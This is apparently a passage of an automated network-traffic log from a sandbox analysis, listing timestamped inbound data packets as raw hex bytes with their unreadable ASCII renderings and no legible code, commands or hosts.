2021-12-02 06:09:37 UTC	26	IN	Data Raw: e7 60 8e 26 f0 bc 11 b7 73 25 14 fc 0c 78 36 de 3c 89 47 99 aa 73 f8 8a f2 5d 76 5f 41 9e 19 cb 63 87 ac 96 1c d9 d6 4b 82 0f 7d 49 f8 59 00 93 e3 ff 5e 91 78 2d 45 f2 01 0a 61 0f b1 cb 3a bd c2 b7 9a 21 3d d7 ce 4f 8a 6c ff b1 0f 4a d3 56 81 d9 3e 32 56 0c 27 0d 18 d4 15 91 5e 5b 4f 44 20 d3 a3 fd 2d 1d 9b 4a 98 e7 76 82 7e b1 d5 64 6b e5 a1 b2 ef ce 88 b5 cb 6c 23 8c a3 9f 7c 3f bf 32 a3 8b 04 8e d5 0e 08 b7 ce d0 59 f6 60 3a 15 83 00 8f c1 1e 0f 09 25 06 9e 10 5b 11 f2 69 8a 2c 2a 7f 83 be ea 94 4a bb 04 89 2d a4 07 62 81 0b f0 49 0d e5 03 b5 3b 5d 9a be 7e 81 83 68 72 4e 77 73 99 ec 87 bd e1 c1 31 94 af fd b2 be c8 b6 50 c3 11 ee 34 f7 84 f8 2c c9 41 5a 9e 3e 85 32 e2 17 a3 d1 0c 6b 9b dd 5e c0 aa 56 d4 74 1d 85 47 c3 08 55 2b 0f e0 47 6c bf b5 9e 13 Data Ascii: `&s%x6<Gs]v_AcK}IY^x-Ea:!=OlJV>2V'^[OD -Jv~dkl#\|?2Y`:%[i,*J-bI;]~hrNws1P4,AZ>2k^VtGU+Gl
2021-12-02 06:09:37 UTC	27	IN	Data Raw: b4 ac bd 57 97 dd 0d f6 58 40 4a 1b 13 ef c4 d1 02 94 47 01 9a ae 4b e5 67 fd 50 b1 cb 14 1b ae 85 4b 0b 33 8d 89 eb c0 32 ee 4e 01 b9 af 03 c0 a1 14 23 f4 5b 39 76 23 3a 4c 8a 24 76 f8 56 2d 63 07 51 fa b6 4b c5 25 2a 0c 0b e6 16 5b ed 5e 5d 18 63 72 dc 04 49 a0 85 48 49 de 3d 2f ed 74 4e d7 c0 09 de e2 9a c6 d6 ac 07 77 ea 6c 14 fe a5 9a ce c6 06 39 82 aa 7c de 38 76 63 4c cc 43 5f 2d f6 fd 1e 28 02 11 58 bc 0e 4c bb 28 43 e4 a6 ad 74 31 04 49 0d d8 3a 8f 2f a6 f9 3f 26 21 55 d2 7b e1 c4 e0 d3 3a 85 af 12 12 12 da 82 3c e4 39 95 68 67 6b 24 30 75 c2 04 23 21 4d 8d 50 3b 6c 56 8b 95 7f 25 b7 f5 ae 16 cb d9 ec 50 4c f2 9d a9 2d ac a1 7e c4 95 3d 85 ea c8 1c 4f b3 38 c1 8b d7 0d da 9e 82 99 98 11 56 5e 9e 72 16 b9 cc e6 65 be 9a 11 00 c7 66 b6 59 1c 49 92 Data Ascii: WX@JGKgPK32N#[9v#:L$vV-cQK%*[^]crIHI=/tNwl9\|8vcLC_-(XL(Ct1I:/?&!U{:<9hgk$0u#!MP;lV%PL-~=O8V^refYI
2021-12-02 06:09:37 UTC	28	IN	Data Raw: fa 06 64 cf 20 52 74 27 72 d1 bd 5d 9f 5b ea 82 b9 88 ae 65 1d 63 1a 70 94 03 15 04 b9 f9 27 90 77 3f 10 7f 2b 52 ce 90 1c bb 08 8c 5c 39 ed a4 46 24 09 9d 7e 6f 64 83 17 89 e5 06 80 f7 8f 32 cc fd f7 39 ea 9d 56 6e d5 ac 19 8a 06 89 1e df 51 2e 28 e3 c9 12 55 3b 3e cf db ac 97 d9 2d b4 56 82 c8 72 1c 82 9e bb 9a 5d 75 fb df 57 f3 35 d8 1d 78 74 1d 5b 4e 70 79 90 c0 f3 b9 34 43 39 a6 13 71 97 68 72 06 a6 97 ef 55 3c 5f a7 b1 ec 6d ef 74 4b c3 32 a2 7c 13 6e cc 3b 3f 1d 98 ed 6a 56 1a 32 ed 8f 74 df 00 73 1f c7 b3 fa 68 9e aa 20 d7 e6 0e d5 0e b5 2d d3 20 e1 4c c0 fe c4 77 79 78 0f 41 b5 46 87 d5 02 4f ce 63 5c 94 b7 c0 60 40 8d 83 22 2f d1 0b 69 0c 28 a0 61 09 da 5a f1 f7 85 e2 c7 ca 9e e6 cc fc ab f4 f2 29 5a 2f 5d 41 11 0b 44 53 66 2a 0e 68 99 43 ce 83 Data Ascii: d Rt'r][ecp'w?+R\9F$~od29VnQ.(U;>-Vr]uW5xt[Npy4C9qhrU<_mtK2\|n;?jV2tsh - LwyxAFOc\`@"/i(aZ)Z/]ADSf*hC
2021-12-02 06:09:37 UTC	29	IN	Data Raw: 6c 66 06 19 35 62 6a 05 82 f5 f2 14 fe 50 22 9c 93 6c d3 a2 5f 36 88 83 29 2d 67 e2 f5 f7 76 30 f9 45 87 d9 5e 27 62 e7 2b 49 9b 26 1a a5 8a 1f 64 44 5e 22 60 78 33 55 a3 a7 67 a6 24 15 1a 41 44 a2 e3 5e 3a fe 92 98 1d 56 9b cf c1 a2 f4 ff e2 97 f2 07 51 3d 67 c4 2c 23 5d 70 29 36 34 75 fb 3b 6e c7 68 22 dd fa 93 0d ca 53 95 12 dd 00 76 4d 03 07 f2 87 c8 da 07 f1 bc ed 85 16 17 52 8a 7d 81 2e 6a 2d 0c d6 09 ed fe e1 ed 17 db e6 38 b9 de be 7d ee e1 db c5 6e 11 93 74 f3 2f ce 19 72 57 52 6c 89 76 5c 1a 3e 47 49 a3 f0 ea f9 64 8c 7d 67 15 6f 75 2b a8 d7 79 02 9e c5 25 ff 61 4a 34 66 2e eb 7b 2c 76 31 c0 f7 55 a3 3e b6 ef 6e 2f 75 c5 c6 d6 0b 76 a8 34 03 a7 61 c2 d7 61 e8 d9 83 aa 94 e9 f6 96 f8 a7 46 ac 46 c6 9b f5 bf 68 e6 6d fd 0a 0d 7c 1b db fe 51 b2 cf Data Ascii: lf5bjP"l_6)-gv0E^'b+I&dD^"`x3Ug$AD^:VQ=g,#]p)64u;nh"SvMR}.j-8}nt/rWRlv\>GId}gou+y%aJ4f.{,v1U>n/uv4aaFFhm\|Q
2021-12-02 06:09:37 UTC	31	IN	Data Raw: 83 bd 8f 2f c7 d1 64 32 f3 7d ff d1 b2 37 e5 df 5e 43 ed 8a 0d eb 36 1c 1c 1e 99 41 a0 b5 16 2f 6d fc b5 1b 8a 8b 3c b0 b4 53 28 b9 6d c2 b7 b6 1a 23 3a f8 9a 3e 38 e8 0f 00 7f c1 6e 15 7c b0 48 52 9e 3d 81 db 2c c9 75 85 6d 9b 31 5f 3e 76 e2 f4 d8 2c 2b 90 db d6 1d 07 eb f0 51 0e 43 b0 57 ba 1b 6c 61 20 d1 54 d2 86 3d 27 28 32 54 9b 05 bc fc e3 a6 f6 12 66 34 42 91 2d 45 b4 85 3f 53 5f da e6 05 51 9c dd 35 6d ed c5 da 5e 3d c2 b4 02 55 09 fc ec 56 cf 01 32 90 94 cc ea 42 f5 c6 6f e9 ff 7a c0 4c 1e 80 ff 4a a3 5e 24 a4 b1 64 ea 2b 9c 1e af c7 47 f6 16 cb af c0 06 b4 5e 6e bc 0d 52 0d 31 70 f2 72 ac 4b e6 1e 20 5f df 1d 53 45 7c 3c 72 57 c3 d0 06 05 8c 1f eb 17 a7 10 86 08 8a 35 ce 18 f3 b9 7d 96 15 25 b1 fb b9 7c bd e5 33 35 35 44 da 75 50 29 72 8e f1 d0 Data Ascii: /d2}7^C6A/m<S(m#:>8n\|HR=,um1_>v,+QCWla T='(2Tf4B-E?S_Q5m^=UV2BozLJ^$d+G^nR1prK _SE\|<rW5}%\|355DuP)r
2021-12-02 06:09:37 UTC	32	IN	Data Raw: 3d 6d 0d 08 c6 d5 33 13 0f 4a 35 07 36 bd 7c 53 0e 9a fb 8b 9c 41 d1 95 2d b1 85 40 bc 8f 9e dc 95 5f 14 75 c0 e1 87 c7 83 ec c6 3e ae 12 5c 36 5a 7f c9 a3 90 5f ad 93 86 4a 9c a4 f2 71 77 13 0d 68 9b 94 69 3c c6 24 1c b7 7a 40 dc 30 88 69 a6 c6 81 5a a1 3e f7 e6 38 2c 99 08 13 7f 0a f3 53 d2 78 92 a1 b3 01 77 53 d0 c3 ba de 8e 18 17 eb 09 93 f1 15 76 4f 51 91 a3 9b ff 04 97 aa 5c d6 a4 1b 42 98 33 6d 88 93 3f 66 a8 cb 1d 74 1a 41 b8 fa e0 d8 ca 8d fb 94 9c 71 d4 4b 67 da e2 35 eb ef ca a7 69 a5 a1 5a 2b 65 f3 94 0d f6 3a ab 1a 38 d1 27 ac 25 f0 31 02 71 04 26 f6 0c d6 1b f9 d4 82 73 16 26 cc 09 5e 27 1b 08 0f 2a 8d c2 c5 5c 05 8c aa b8 46 01 88 37 45 bb 4e 45 08 88 6a 14 18 f4 30 21 0d e0 8b 5d e8 26 86 e2 4a 56 28 d4 98 0c 7a 5d c3 dd 94 9d ca 33 e0 ac Data Ascii: =m3J56\|SA-@_u>\6Z_Jqwhi<$z@0iZ>8,SxwSvOQ\B3m?ftAqKg5iZ+e:8'%1q&s&^'*\F7ENEj0!]&JV(z]3
2021-12-02 06:09:37 UTC	33	IN	Data Raw: 42 54 9b 92 f5 a3 5d d3 a8 85 26 3f 88 59 64 b0 f5 3b c0 86 26 54 a6 b5 95 6a f2 ef fb 71 b7 9c 68 b6 97 ce b7 28 a2 7a 54 3e 6b 7a 6d 2e e1 9d d6 62 76 42 30 b0 22 da 69 07 7c 93 10 97 d8 e8 78 14 75 92 c9 2d 35 cd 60 71 88 32 80 3b 43 dd a8 b1 f7 03 e5 35 a8 f2 44 2e 5d ef 82 d8 ed b5 ea af b4 f8 be 33 b6 2f 22 95 07 4b 49 7a f5 88 1d be a9 e8 8e 82 d7 8b c1 18 97 5a d0 99 42 da 2c b4 ec c6 ba 38 d5 fd c2 fa af 85 b8 68 8e 05 de c4 53 c6 2c 3c bf 5f f1 29 73 a0 2c 10 b1 22 c8 39 ef bf 4a 1b 8c 6c 13 ee b9 75 b9 91 85 4d b6 b3 0f 54 35 9e 58 48 93 4c 72 21 2a bc f7 38 7e 65 33 0b 7d 63 de 65 f2 3e e7 99 4e 34 69 17 34 35 bb b3 da 93 c0 8c 00 2e 51 94 54 47 43 2a 4e 25 cf 37 ce 37 39 ac 49 54 d7 d7 93 d7 15 b7 0d d3 ed 47 a4 17 ec 64 d5 e1 84 6c 73 36 ff Data Ascii: BT]&?Yd;&Tjqh(zT>kzm.bvB0"i\|xu-5`q2;C5D.]3/"KIzZB,8hS,<_)s,"9JluMT5XHLr!8~e3}ce>N4i45.QTGCN%779ITGdls6
2021-12-02 06:09:37 UTC	34	IN	Data Raw: 41 86 f3 c1 38 e6 e7 d3 3b 4b 97 68 74 fe 2a eb d4 a6 d1 26 50 d3 4a 61 b5 41 7e 6c f8 d7 7b 5d e0 3a ea 7d 21 27 2d af 02 6e a1 10 cc 3d da 72 f1 e6 31 fe 2c 08 ec 28 c9 37 11 9e cb 55 cd 63 03 9e 64 4c e6 da 8d de dd f5 72 f7 11 53 6b e8 c1 b0 bc 6d 70 33 cd e4 42 37 18 8a 2c 4a 80 2f 6d 0c 54 e9 2b 22 2c 5a b6 d3 e8 3b 2d 65 b2 87 46 ea b7 4c 0e 80 3c 66 28 56 9d d6 58 2f 51 d5 5f ce 1e 9d a3 1f a1 09 d3 fa 2a 1d b5 cb 88 19 d7 8b 94 86 3c 96 28 30 32 c6 e2 62 93 b6 43 76 58 7c 5f 7b 81 e0 db 36 ae b4 33 9b 65 d8 be 83 fb d4 b0 75 65 0d 74 db 5a 70 22 2f 27 d2 4e e6 1e 58 0a 36 e5 6c 17 c4 21 54 e8 3c a4 9f dc e7 26 a3 e7 0a d4 8e 17 80 57 bf d0 f2 73 38 17 ff 18 3a 18 cf ca e0 04 46 a8 e7 47 51 92 26 3f de 63 11 2c a9 6b 2c f6 e4 3b a8 a4 26 c8 13 ef Data Ascii: A8;Kht&PJaA~l{]:}!'-n=r1,(7UcdLrSkmp3B7,J/mT+",Z;-eFL<f(VX/Q_<(02bCvX\|_{63euetZp"/'NX6l!T<&Ws8:FGQ&?c,k,;&
2021-12-02 06:09:37 UTC	35	IN	Data Raw: 0b 7d 70 5d 4b 20 36 be 85 00 d1 7d 25 2a aa 32 7a bf 27 66 3c c4 ae a0 2b 81 00 82 88 d7 c0 67 6f 46 6c 10 45 8f d9 f1 bf d2 a1 be 86 c1 d9 88 9e 6e 49 0c 59 f5 7c c8 06 c8 ed 5d 56 7f c3 f8 57 79 88 c0 47 17 8f d3 b9 e6 5d 3f 61 5e ad 02 f4 16 1c 6a a3 42 f9 5a 15 8b b9 fa df 03 db 95 01 9c 94 50 f6 8c 52 22 e8 ce e8 21 a8 19 f8 0e 8e 6d 59 3f c7 f5 10 2f 17 3c e9 88 a1 c9 e5 3f 8c 73 ba 66 bd 2e bf f6 63 48 e2 df 67 d3 2a fc 10 e9 c9 77 9a 6a 0c f3 14 88 e4 49 f0 81 c9 5b b4 2d 46 ff 6b 87 57 38 e3 26 8d 7e b0 4c 26 92 bf 29 94 a6 03 d4 d8 66 cc 75 86 64 55 2f ca 86 e0 cb 99 dd c2 b7 79 c5 3d cf 4b ef 01 d3 f9 88 d0 bb f8 56 80 66 cc aa 0a 1b 0a 09 14 6c ce 4b a9 f2 1c 9a 84 6d 5c f8 93 86 4a c1 ad 8c 2e 40 ba fa 07 f3 a3 2f 23 b5 35 2a 66 e2 69 63 5b Data Ascii: }p]K 6}%2z'f<+goFlEnIY\|]VWyG]?a^jBZPR"!mY?/<?sf.cHgwjI[-FkW8&~L&)fudU/y=KVflKm\J.@/#5*fic[
2021-12-02 06:09:37 UTC	36	IN	Data Raw: a3 58 73 b0 18 3b 0a 1d 77 96 62 4d 7b 4d 79 4f 26 da 25 35 97 23 cf 48 b1 0d 09 19 ac 08 9b 85 7a 87 45 6e d6 9c 7d 40 e4 8e 62 d9 47 1c 62 59 ff bd 69 6b 54 46 21 9b 42 9b a7 15 d3 f7 7f 4e 1a 9e 00 68 80 6e 5a 66 6f 8d 43 7f 93 79 fd c4 d7 73 4c 6a 47 2e b0 d5 5b cc 49 29 97 ea 93 33 3c d5 c0 83 23 57 a7 2b f1 95 a4 ca fe 93 20 f2 4d f3 11 8c f7 3c 67 b2 be e5 03 d9 31 e8 c7 07 1a ef 4c 6f bd 03 7c 3e 2c 09 67 ff 77 6c 6f 1b ec 10 b1 35 ab 4b b0 01 c7 be 7c e1 61 9c ce 4c 5e eb 22 6a e2 68 aa a1 d5 ec 2a e5 36 ee 4e 25 f6 06 89 04 d5 91 b6 fd 5b 38 04 d3 c6 4e a5 86 e5 23 f3 80 cc 90 69 3e e5 49 96 cc 00 dd 81 b0 16 ce 44 3d db 59 70 9d d0 69 c9 4d a7 50 7e 8b b3 90 ef 4f 68 a8 60 da b4 eb 40 73 b3 e7 f0 59 9e 63 c0 36 ab bf f3 c2 66 95 58 a4 e8 a9 6d Data Ascii: Xs;wbM{MyO&%5#HzEn}@bGbYikTF!BNhnZfoCysLjG.[I)3<#W+ M<g1Lo\|>,gwlo5K\|aL^"jh*6N%[8N#i>ID=YpiMP~Oh`@sYc6fXm
2021-12-02 06:09:37 UTC	38	IN	Data Raw: af 73 7b ce 2c b0 12 c3 05 1a fa 1e e2 34 d1 2b 0e 0e 48 7a 74 b8 93 37 1a b1 d1 2d 2d d7 80 cb 7d bd c4 11 43 c7 77 9a af c3 7f bd 28 fc 1e 4f be 05 f3 e8 90 d5 7e 35 34 54 1c f9 84 26 d7 63 e1 a7 28 10 f1 1f 93 b0 9c d1 c9 9b 22 5e eb 7f 8e 9a 42 3b 2c 5d aa 3e 48 11 87 33 e4 5b e0 94 0b 41 7d bd a6 09 a1 28 ce 21 5d f2 b2 aa bb b1 dd 80 eb db b0 57 4d 22 d3 e2 4b 9e 38 9a b9 33 35 03 bc aa 55 af 64 ec 00 f8 73 3b e3 9b 24 8d ee 0e 03 ac b9 88 49 ce 86 7d 44 08 da 07 bc 56 54 be 97 bc f6 d1 37 ef 7c ff 7c 35 2d 65 4a 40 e1 e5 17 5b b9 1a 52 3e d7 fd 73 d7 b1 8f 80 55 bc 04 f5 1a 1d e6 a6 33 68 a9 c7 34 a7 41 58 9b 91 a5 5f 8c 86 9f ab d4 6e c2 4a c6 dd 92 9c 23 4c 8c f2 be 56 82 b2 92 b9 b1 15 f6 53 0b e6 60 c8 6d de 96 66 96 73 56 39 2e aa 65 7f 1b 20 Data Ascii: s{,4+Hzt7--}Cw(O~54T&c("^B;,]>H3[A}(!]WM"K835Uds;$I}DVT7\|\|5-eJ@[R>sU3h4AX_nJ#LVS`mfsV9.e
2021-12-02 06:09:37 UTC	39	IN	Data Raw: a8 a9 b7 ce ee 0d 8d 92 8f 60 5c 04 6e 1e 31 06 fa af 85 e8 a6 71 fa 3f 3c ba 02 df 8c 98 8b 9d 7a f3 c8 88 51 b1 8a 15 2e f6 01 b5 78 50 33 28 1d bf 6a d5 05 19 3b e2 0d 43 5b 84 61 f4 f9 8c 8b 4e 8b 22 94 7a 83 b6 59 a9 f4 d1 6c df be 03 29 a5 86 ec 94 a5 bd 6d 2f 6b ba 32 e0 fd cf 00 dd 74 71 41 d8 f9 d5 0e 2f eb 23 8f 60 7a 4f fb f2 42 55 c8 ff 7a 10 bb e5 14 b5 e7 bd 44 f3 32 20 4e a6 fd 53 50 4c a2 40 45 16 91 66 54 22 60 cf 52 74 63 26 6c 41 71 c4 fa 0d 1c 3f 88 21 e2 bf 00 74 4c c2 19 ea 2c 21 36 08 66 c1 dd 4e db e5 26 19 c7 23 40 21 27 1c 43 bc c1 5b ef 73 85 25 b3 b3 22 7d db e2 5e 9c 26 1e ab 54 85 78 66 56 5f 7d 7a 46 00 c9 9e 78 dd 0f 1c 4a 32 0c 15 bb af 34 75 8f 9b 05 c9 6e a7 2b 81 35 e2 b5 fa 82 01 ef c9 1c 19 68 4e 0f 22 c0 bb cc 6d 4e Data Ascii: `\n1q?<zQ.xP3(j;C[aN"zYl)m/k2tqA/#`zOBUzD2 NSPL@EfT"`Rtc&lAq?!tL,!6fN&#@!'C[s%"}^&TxfV_}zFxJ24un+5hN"mN
2021-12-02 06:09:37 UTC	40	IN	Data Raw: ab 1b eb b1 86 5d 1f 0d 4f 9c 1f d3 a3 fc 2d 20 0f b5 67 3f 66 52 2f 52 af cd f7 e8 07 84 9d 76 ff be d7 76 ef f4 1d 46 f4 33 ae 59 c4 20 f4 f5 19 29 ae cd 4a fa 27 84 19 bb e8 96 58 36 d9 74 56 a5 b8 a4 ae fa f0 ff ed 3a 3b 1d 18 dd bf bd 89 d1 06 a8 db 5c be d2 8d 2c 2f ea 95 57 c1 d5 89 42 eb 1b b2 09 32 70 21 54 ac 3d 18 e4 c3 32 44 4f 66 3e 3e 46 af a8 7d 41 64 88 67 41 3a ee 30 96 ea cf 58 e8 43 52 62 09 88 8c 2a 62 05 0f 91 23 71 f9 c3 bc 91 c5 a1 ed 31 12 0f 4c de a3 2a 59 b7 24 36 3e c8 6e 4a 8a 55 b8 c4 2f 88 8d 59 2f be 99 0c 70 3a 47 52 22 94 44 3e 57 9f 3f 83 c2 27 5b 89 ad 37 bd 79 4f 92 36 09 ad 36 43 cb 1f ed c8 a9 dc 28 7b 78 bf 4a ef e3 f8 83 d4 eb d8 43 e6 a8 ea 76 05 39 f7 f9 d4 72 c7 6b 27 4e 36 54 9b 34 03 57 a3 d2 df bb 5e f2 0b a6 Data Ascii: ]O- g?fR/RvvF3Y )J'X6tV:;\,/WB2p!T=2DOf>>F}AdgA:0XCRbb#q1LY$6>nJU/Y/p:GR"D>W?'[7yO66C({xJCv9rk'N6T4W^
2021-12-02 06:09:37 UTC	42	IN	Data Raw: 6d 4d 37 f5 3e 1a 14 2f 56 5b ae ec 9f a3 3f b6 ef cd cf eb 0f a6 15 c5 ca 08 71 a3 dc 95 06 82 76 56 eb 01 b1 8e e0 e2 e0 ac a2 af 3f a4 4f d7 d2 cf 4e 28 9f e8 8e 06 fd b4 6c aa d8 e9 b4 15 f1 6d 5c 3e 29 ca a6 ef d9 de 8f 77 42 48 6d 4c 7a 82 56 be ab e5 99 1c 1f ed 49 a9 d2 be 67 17 1f ab b9 7b a5 f8 ba b2 0b ff f7 29 98 97 a2 23 5c 09 5d c4 57 cb f8 49 01 87 5d 8a 7d dc f5 24 d1 83 5a 33 68 2e bd 2f 27 68 c4 96 dd d7 ee b2 9e 82 4c 0a 77 de a0 0e 9c 08 d1 7d f0 0c aa 32 af 2d e8 ac 25 6d 18 b5 2b e7 df 82 63 12 a3 61 d7 58 93 cd 1f 95 67 0e fb 53 8d c5 6e 84 de 60 c1 33 f3 0b 56 cf 95 12 76 02 ce a4 44 97 a9 27 7e 79 2e c1 c5 6d 8d 61 4a ee fd 54 8e 3e b7 89 f9 75 09 c3 0b a9 3f 6a 4a 50 e2 92 fc 1c 86 e9 3f af bd 9c f9 25 83 bf e8 d9 f7 61 d4 22 7f Data Ascii: mM7>/V[?qvV?ON(lm\>)wBHmLzVIg{)#\]WI]}$Z3h./'hLw}2-%m+caXgSn`3VvD'~y.maJT>u?jJP?%a"
2021-12-02 06:09:37 UTC	43	IN	Data Raw: df a7 97 5a ee e3 97 ce 12 cc 9c 05 f8 7e e0 88 48 13 52 ed ae 51 64 70 6e 73 6e 96 68 a8 f1 5c e8 9d c6 87 9e 99 8b a1 93 e5 7b 29 0d 21 97 aa 10 32 a8 a1 e8 79 fc 6e e1 0c d7 4a 17 03 aa 46 28 e0 a8 0e 06 7e 95 b2 a0 e7 9a d1 5c 22 bb 34 5d 72 43 06 f7 5a 08 2a f9 d8 1c 79 61 78 58 75 aa 56 a8 ed a2 b4 91 d3 af a3 4e 00 c1 46 17 b1 ab eb 68 88 fe 8d b5 0b 02 f1 76 36 9b 87 44 8d 38 55 bb f5 b2 ab 32 92 50 24 97 de 19 a4 b6 38 9a 31 30 4f a5 0a 6c ae b2 6e 2b a5 f8 49 16 4f 52 f1 51 3c d6 49 98 b4 a7 fe 96 95 f5 a9 5f 45 e7 f1 1f a4 51 ae 37 2a b7 b7 0b 66 0b fd 53 3f 07 ad b8 94 43 6c 68 07 fc 18 35 da 88 11 17 74 90 be ba b5 da 5e 56 6e 20 fa 6e 10 6d 9b eb 9a fe 98 20 fc ff 16 15 d9 2b ec 70 b9 ba af 8a 5b b8 94 b8 9e 2f ef ee 2b 05 6d 0b ce 75 60 62 Data Ascii: Z~HRQdpnsnh\{)!2ynJF(~\"4]rCZyaxXuVNFhv6D8U2P$810Oln+IORQ<I_EQ7fS?Clh5t^Vn nm +p[/+mu`b
2021-12-02 06:09:37 UTC	44	IN	Data Raw: 98 51 8a 73 0c 3a 29 7e 3e 75 fb 6b ce 86 aa e5 58 99 d1 77 4f e0 e3 59 ca 0e 99 3f 75 38 69 dd 3e 38 08 a6 f8 6e a9 e2 20 fc b5 6c cc 16 10 de 09 aa 32 ac 0f 5f 12 8e 51 2d 40 3c de 8a ce e8 1d 51 88 ee e4 6c da 66 f8 d1 7c bf 12 29 66 79 3e 4c b8 c1 b8 71 76 87 6a 82 64 f9 b5 ba 36 d0 fa a7 5d 7e 79 3f 1f 68 d6 c5 1b 25 42 5d f5 42 29 a5 8f db ad 5e 60 a3 3e a8 60 4b d0 4d bf 07 a8 79 a9 57 83 77 57 69 48 ce e4 e8 d9 34 18 13 c2 b4 7b a7 ad 46 60 c6 0a 9e e3 26 b6 c9 7d 5f 36 68 e1 e7 25 c6 5f 9f 6a 8e 5a 34 a0 d2 f9 5f a9 ee e1 b7 57 8c e9 9a 6c 40 43 44 dd 5a b6 ef 5d 42 44 d0 4c 52 4b 94 90 8e 57 13 5d 22 07 50 f8 d9 3b 66 f3 1f 93 24 f1 25 93 64 dd 9c be 63 73 ad 42 20 d6 26 8d 3c 48 11 99 a3 0b 8f 4c 01 fc f9 75 7c 92 7e d3 1f c4 60 02 0d d7 a2 49 Data Ascii: Qs:)~>ukXwOY?u8i>8n l2_Q-@<Qlf\|)fy>Lqvjd6]~y?h%B]B)^`>`KMyWwWiH4{F`&}_6h%_jZ4_Wl@CDZ]BDLRKW]"P;f$%dcsB &<HLu\|~`I
2021-12-02 06:09:37 UTC	45	IN	Data Raw: f8 e8 1d bd 07 14 76 88 c6 92 5f 95 b7 19 7b 7c cc 13 f7 bf ca 30 69 b7 8f 65 24 47 2a de 51 5f 12 49 af 73 58 4b 40 94 33 c0 f2 d6 d7 62 e4 d7 19 02 47 52 66 5e 97 de c2 09 ce ff aa 09 d3 7c 2a 3b 82 55 54 18 66 d6 e8 36 eb 1c e7 a4 5f 11 bb 62 93 3c fe 27 dd 7b 81 64 93 42 e7 2f 20 c8 36 b0 48 41 49 7c 57 53 92 ca 27 93 4f cb fa ce dd 29 66 cb 88 de 64 0b 58 a3 26 43 e8 3d e6 15 93 67 ac 33 73 8e 9c 0b 56 60 ae d9 8a 71 f1 0e 73 21 32 b1 07 ee 2d 3b 18 f7 bc f5 99 89 da 2b b4 11 79 1e e9 3a f2 4b 3b 1d 87 6b 08 a0 7a 08 de 64 1b ec 10 b1 56 3a 64 f3 09 b5 0c 42 f8 67 d3 fd 34 61 e3 8c c6 32 04 e0 11 43 e4 63 e6 32 ee 70 8c a2 11 b1 51 96 96 cc f4 fd d5 86 e0 f5 36 96 8e 4a 34 da 78 a3 2b f7 fc b4 40 6a 32 84 1c 81 12 2e 3e 6c 22 4e 64 c6 9d 4b 76 55 43 Data Ascii: v_{\|0ie$GQ_IsXK@3bGRf^\|;UTf6_b<'{dB/ 6HAI\|WS'O)fdX&C=g3sV`qs!2-;+y:K;kzdV:dBg4a2Cc2pQ6J4x+@j2.>l"NdKvUC
2021-12-02 06:09:37 UTC	47	IN	Data Raw: 5d 89 45 ff e3 c5 99 a8 33 6a a3 45 79 6f 4a 17 0f be 66 a2 79 56 1e 46 61 5b 2b 45 ab ee e8 4e 7b 91 57 21 f6 72 fe a7 46 26 8e f5 49 6d 64 a3 94 77 5f c9 a0 5f 2d e3 84 4e ce 60 8e ed bf 63 fc b7 1d b4 bb eb b7 a7 d6 a5 65 33 1a 5a 0d d7 5a 8e 22 76 63 f3 e8 85 6f 8e 27 a8 8e 33 e5 26 1a 0b 98 05 6a 03 c5 51 e6 6c 1c fd e9 76 d3 e5 50 9f 0f 2c 95 4a a0 63 95 b5 b8 f8 e8 2e 9b 07 3b 61 b2 c4 f7 09 c9 e4 46 df a7 d1 d3 3a 2c 4b 53 b7 eb 0d 9a 0c 1a ca 22 06 24 d3 a3 22 b5 89 d6 8d 1d ac 77 fe 45 24 20 63 57 62 17 bf 9b 76 75 bd e1 16 6b 8a d1 8e 8e 08 11 96 b5 74 b3 b6 db 1a a8 cd ea 2f bb 3f 54 80 92 53 f9 70 6f 43 7b 52 85 9b d4 3b 5d b9 5b c5 a2 d2 c5 47 f9 30 fb c2 7a 74 8e f2 c2 7f 09 7d 93 fd 59 66 d9 a7 b1 8d e7 8e a3 1e df 9a 92 22 53 02 1e c4 36 Data Ascii: ]E3jEyoJfyVFa[+EN{W!rF&Imdw__-N`ce3ZZ"vco'3&jQlvP,Jc.;aF:,KS"$"wE$ cWbvukt/?TSpoC{R;][G0zt}Yf"S6
2021-12-02 06:09:37 UTC	48	IN	Data Raw: 22 f5 75 e5 27 16 71 4f e6 6a f6 ef 14 1e da 5c b2 5b 2d 3d 04 13 4f 4b 04 17 b0 a9 58 d3 60 72 0b c9 84 f4 5e cd c7 b7 41 da c4 20 b5 a5 be 91 89 9b 63 bb af aa 5c cc 75 fa 4b c4 b0 b3 9b ce e2 5b 4b d6 64 0d cc 13 b1 1a 78 49 b4 01 b5 f3 87 06 e3 d6 bf 1d 5a eb 8c b9 48 df e8 9e 01 d1 5c ee 32 95 a5 77 a1 97 f3 60 a5 9e cc 0b 66 be 4e 91 b7 0b a1 86 4a 4f 5f 09 3f a8 b5 c5 9f 48 6a c2 1f 9d f4 de 6c 7b 43 2a 4e d3 70 a2 0f f0 17 02 b9 f2 42 e6 38 09 46 db bb db 9b 05 4b a3 38 5c 6e 83 8a 6a ee 6c 66 30 a5 ca 92 52 d0 ba 2a 06 eb 7a ce 74 63 e1 69 fd a6 5f 44 0d 06 5a 4f 5f 98 98 70 73 30 6e 12 6f d3 92 a2 be 97 69 ca d8 d1 e5 26 89 aa 0f 22 21 27 9f c2 83 64 74 a9 0e 81 25 15 ad 41 02 24 da 24 2d 86 be 67 9b c4 3f 30 b7 c0 91 81 39 97 ca 7d c9 26 98 3b Data Ascii: "u'qOj\[-=OKX`r^A c\uK[KdxIZH\2w`fNJO_?Hjl{CNpB8FK8\njlf0Rztci_DZO_ps0noi&"!'dt%A$$-g?09}&;
2021-12-02 06:09:37 UTC	49	IN	Data Raw: 9b 64 dd fe e0 90 dc ad 42 7c de 26 8d 22 0c 11 d1 a3 0b eb 44 01 fc 7d 0b 33 53 7e d3 73 cc 60 02 24 a8 ab c0 d3 01 42 19 a9 f2 23 a0 a2 21 9b 2e 69 84 65 b5 98 6c c6 fe 7d 28 e0 66 e0 5a 5b 0e 8f c0 4d c7 9c 9e 4c b2 d9 db e7 e6 29 5f 84 b9 04 8e 5e d6 62 fb d2 21 c0 86 93 b8 52 08 fe 06 57 f1 cf a7 32 a3 1c a7 ec cd 63 bf a6 6b 02 7f bf d0 09 49 42 c1 33 f7 16 47 82 ae 75 82 2f 3c 5d d7 03 b5 a5 eb 8a 1c df 25 96 54 e7 fd 5c a5 1b 46 c6 50 eb b4 c8 8a 80 2c a5 bc c8 1f e0 d8 74 6a a0 9a 43 ca 2c c9 29 27 96 80 3a e5 43 ea 0a 79 ad 52 0c ad 99 c6 8a b3 ae 4b 61 97 f9 0b 9d 91 c3 a4 48 50 46 7f 8d 94 8d 7a da c6 46 28 fc f1 0b d7 b9 46 bd 8d 93 50 e1 1a ab 